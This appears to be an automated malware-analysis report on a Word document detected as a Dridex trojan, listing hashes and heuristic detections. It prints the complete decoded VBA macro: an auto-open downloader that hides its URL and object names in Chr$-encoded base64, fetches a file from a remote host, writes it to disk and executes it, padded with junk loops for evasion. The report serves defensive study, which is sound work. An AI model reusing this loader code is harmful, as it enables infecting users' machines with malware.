Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1b0ab691ac932688…

MALICIOUS

Office (OLE)

Size: 43.0 KB  Created: 2015-03-10 03:23:00  Authoring application: Microsoft Office Word  First seen: 2015-03-15
MD5: 04a1425948920060d48c0854f72740f9
SHA-1: 0d0d7e4cdb72b7ba67ebba43a110357c49416b03
SHA-256: 1b0ab691ac932688ebb7745248bdc4e14e16db2e6cd283c1bb860d26c4ef8954
Risk score: 316

Heuristics (9)

  • ClamAV: Doc.Trojan.Dridex-13 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Dridex-13
  • VBA macros detected [medium] (OLE_VBA_MACROS), 6 related findings
    Document contains VBA macro code
  • VBA downloads and writes a file to disk [critical] (OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .Write D8Hif8ju.ResponseBody
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
    .SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                    | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)       | 10052 bytes
SHA-256: 511595d92dc344205ca69c2ab02a7bd0115a4e5c758fd888cbdcbfd5ce31867e
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
eHk
End Sub

Attribute VB_Name = "авпавп"

Sub eHk()
Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
Set w2 = CreateObject(ggSFhCPeLdOSshe(Chr$(81) & Chr$(87) & Chr$(82) & Chr$(118) & Chr$(90) & Chr$(71) & Chr$(73) & Chr$(117) & Chr$(85) & Chr$(51) & Chr$(82) & Chr$(121) & Chr$(90) & Chr$(87) & Chr$(70) & Chr$(116)))
D8Hif8ju.Open ggSFhCPeLdOSshe(Chr$(82) & Chr$(48) & Chr$(86) & Chr$(85)), ggSFhCPeLdOSshe(Chr$(97) & Chr$(72) & Chr$(82) & Chr$(48) & Chr$(99) & Chr$(72) & Chr$(77) & Chr$(54) & Chr$(76) & Chr$(121) & Chr$(56) & Chr$(53) & Chr$(77) & Chr$(105) & Chr$(52) & Chr$(50) & Chr$(77) & Chr$(121) & Chr$(52) & Chr$(52) & Chr$(79) & Chr$(67) & Chr$(52) & Chr$(120) & Chr$(77) & Chr$(68) & Chr$(73) & Chr$(118) & Chr$(89) & Chr$(88) & Chr$(66) & Chr$(112) & Chr$(76) & Chr$(50) & Chr$(100) & Chr$(105) & Chr$(77) & Chr$(83) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), False
D8Hif8ju.SetOption 2, 13056
D8Hif8ju.Send
Dim БQЗлСНпу As Integer
For БQЗлСНпу = 0 To 7
Dim сбСлБwЗф As Integer
For сбСлБwЗф = 0 To 7
Dim ЛqToфВФи As Integer
For ЛqToфВФи = 0 To 1
DoEvents
Next ЛqToфВФи
DoEvents
Next сбСлБwЗф
Dim йбГWиПвк As Integer
For йбГWиПвк = 0 To 5
DoEvents
Next йбГWиПвк
DoEvents
Next БQЗлСНпу
Dim ДяшКиМ As Integer
For ДяшКиМ = 0 To 3
Dim быРИЭВи As Integer
For быРИЭВи = 0 To 6
DoEvents
Next быРИЭВи
DoEvents
Next ДяшКиМ
Dim ЦмФМнГИй As Integer
For ЦмФМнГИй = 0 To 1
DoEvents
Next ЦмФМнГИй
With w2
Dim qйКофДтБ As Integer
For qйКофДтБ = 0 To 4
Dim ХЦИПQуQW As Integer
For ХЦИПQуQW = 0 To 9
Dim ВфмхлФХМ As Integer
For ВфмхлФХМ = 0 To 5
DoEvents
Next ВфмхлФХМ
DoEvents
Next ХЦИПQуQW
Dim ХЗыбЛипЛ As Integer
For ХЗыбЛипЛ = 0 To 4
DoEvents
Next ХЗыбЛипЛ
DoEvents
Next qйКофДтБ
Dim лРWлкдмФ As Integer
For лРWлкдмФ = 0 To 5
Dim ктуЕпwПм As Integer
For ктуЕпwПм = 0 To 8
DoEvents
Next ктуЕпwПм
DoEvents
Next лРWлкдмФ
Dim оухйКИсБ As Integer
For оухйКИсБ = 0 To 9
DoEvents
Next оухйКИсБ
.Type = 1
Dim нЗЙqеwХС As Integer
For нЗЙqеwХС = 0 To 3
Dim оСФWйЕТЫ As Integer
For оСФWйЕТЫ = 0 To 9
Dim иофНхугб As Integer
For иофНхугб = 0 To 3
DoEvents
Next иофНхугб
DoEvents
Next оСФWйЕТЫ
Dim кВЙцИФлр As Integer
For кВЙцИФлр = 0 To 3
DoEvents
Next кВЙцИФлр
DoEvents
Next нЗЙqеwХС
Dim рхqqИГос As Integer
For рхqqИГос = 0 To 6
Dim сУГТапЗй As Integer
For сУГТапЗй = 0 To 4
DoEvents
Next сУГТапЗй
DoEvents
Next рхqqИГос
Dim ыйQКфнва As Integer
For ыйQКфнва = 0 To 3
DoEvents
Next ыйQКфнва
.Open
Dim пwлагЦПЫ As Integer
For пwлагЦПЫ = 0 To 4
Dim пРхфхКНФ As Integer
For пРхфхКНФ = 0 To 4
Dim бицзлаки As Integer
For бицзлаки = 0 To 3
DoEvents
Next бицзлаки
DoEvents
Next пРхфхКНФ
Dim АХаДизхх As Integer
For АХаДизхх = 0 To 3
DoEvents
Next АХаДизхх
DoEvents
Next пwлагЦПЫ
Dim аЫСаттАл As Integer
For аЫСаттАл = 0 To 2
Dim ХйwСТхКк As Integer
For ХйwСТхКк = 0 To 4
DoEvents
Next ХйwСТхКк
DoEvents
Next аЫСаттАл
Dim ХйлМаООт As Integer
For ХйлМаООт = 0 To 4
DoEvents
Next ХйлМаООт
.Write D8Hif8ju.ResponseBody
Dim МхWМфпвW As Integer
For МхWМфпвW = 0 To 4
Dim елЦпыйКф As Integer
For елЦпыйКф = 0 To 6
Dim ОоАлГПРУ As Integer
For ОоАлГПРУ = 0 To 8
DoEvents
Next ОоАлГПРУ
DoEvents
Next елЦпыйКф
Dim ХПоДОДсq As Integer
For ХПоДОДсq = 0 To 1
DoEvents
Next ХПоДОДсq
DoEvents
Next МхWМфпвW
Dim тсчЛФвн As Integer
For тсчЛФвн = 0 To 8
Dim ухЕЦтДЫХ As Integer
For ухЕЦтДЫХ = 0 To 3
DoEvents
Next ухЕЦтДЫХ
DoEvents
Next тсчЛФвн
Dim УдлИЗЗСы As Integer
For УдлИЗЗСы = 0 To 5
DoEvents
Next УдлИЗЗСы
.SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2
Dim МхWВВхлг As Integer
For МхWВВхлг = 0 To 7
Dim ЕлмнфРаЦ As Integer
For ЕлмнфРаЦ = 0 To 7
Dim ыАЕЦасцТ As Integer
For ыАЕЦасцТ = 0 To 6
DoEvents
Next ыАЕЦасцТ
DoEvents
Next ЕлмнфРаЦ
Dim влфдесас As Integer
For влфдесас = 0 To 9
DoEvents
Next влфдесас
DoEvents
Next МхWВВхлг
Dim лбхМФрцН As Integer
For лбхМФрцН = 0 To 5
Dim цыВхwАВС As Integer
For цыВхwАВС = 0 To 3
DoEvents
Next цыВхwАВС
DoEvents
Next лбхМФрцН
Dim ЦпыГаАОА As Integer
For ЦпыГаАОА = 0 To 7
DoEvents
Next ЦпыГаАОА
End With
Set pP5hKP = CreateObject(ggSFhCPeLdOSshe(Chr$(85) & Chr$(50) & Chr$(104) & Chr$(108) & Chr$(98) & Chr$(71) & Chr$(119) & Chr$(117) & Chr$(81) & Chr$(88) & Chr$(66) & Chr$(119) & Chr$(98) & Chr$(71) & Chr$(108) & Chr$(106) & Chr$(89) & Chr$(88) & Chr$(82) & Chr$(112) & Chr$(98) & Chr$(50) & Chr$(52) & Chr$(61)))
pP5hKP.Open Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61))
End Sub



Attribute VB_Name = "оокеаыв"
Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255
Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

Public Function ggSFhCPeLdOSshe(sString As String) As String
    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long
    sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
    sString = Replace(sString, vbLf, vbNullString)      'either order.
    lTemp = Len(sString) Mod 4                          'Test for valid input.
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If
    If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
        iPad = 1
    End If
    For lTemp = 0 To 255                                'Fill the translation table.
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65              'A - Z
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71              'a - z
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4               '1 - 0
            Case 43
                bTrans(lTemp) = 62                      'Chr(43) = "+"
            Case 47
                bTrans(lTemp) = 63                      'Chr(47) = "/"
        End Select
    Next lTemp
    For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp
    bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.
    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
        lTemp = lQuad And clHighMask                    'Mask for the first byte
        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
        lTemp = lQuad And clMidMask                     'Mask for the second byte
        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
        lPos = lPos + 3
    Next lChar
    sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
    ggSFhCPeLdOSshe = sOut
End Function